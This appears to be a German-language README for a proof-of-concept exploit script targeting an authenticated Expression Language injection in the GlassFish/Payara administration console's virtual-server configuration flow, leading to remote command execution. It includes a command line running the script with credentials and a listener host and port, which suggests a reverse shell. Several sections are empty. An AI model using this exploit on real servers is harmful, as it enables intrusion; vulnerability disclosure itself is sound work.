
Authentifizierter EL-Injection-Exploit für die GlassFish/Payara-Administrationskonsole, der die Remote-Ausführung von Befehlen über manipulierte Parameter im Konfigurationsablauf des virtuellen Servers ermöglicht.
Eine Expression Language Injection-Schwachstelle in der GlassFish Administration Console ermöglicht es einem authentifizierten Benutzer, bösartige EL-Ausdrücke in Parameter einzuschleusen, die von der administrativen Weboberfläche verarbeitet werden. Bei erfolgreicher Ausnutzung kann dies zur Fernausführung von Befehlen auf dem betroffenen Server führen.
Die Schwachstelle wurde im Bearbeitungsablauf für virtuelle Serverkonfigurationen identifiziert, bei dem vom Benutzer steuerbare Parameter von der Anwendung unsicher interpretiert werden.
Dies geschieht, weil:
Der Test wurde in einer lokalen und kontrollierten Umgebung durchgeführt.
CVE-2026-2586.py --url https://glassfish:4848/ --user <USERNAME> --password <PASSWORD> --lhost 127.0.0.1 --lport 4444 --insecure
Verwundbare URL:
NUR FÜR AUTORISIERTE VERWENDUNG. DeepSecurity Perú befürwortet keinen unbefugten Zugriff und übernimmt keine Verantwortung für jeglichen Missbrauch der bereitgestellten Informationen.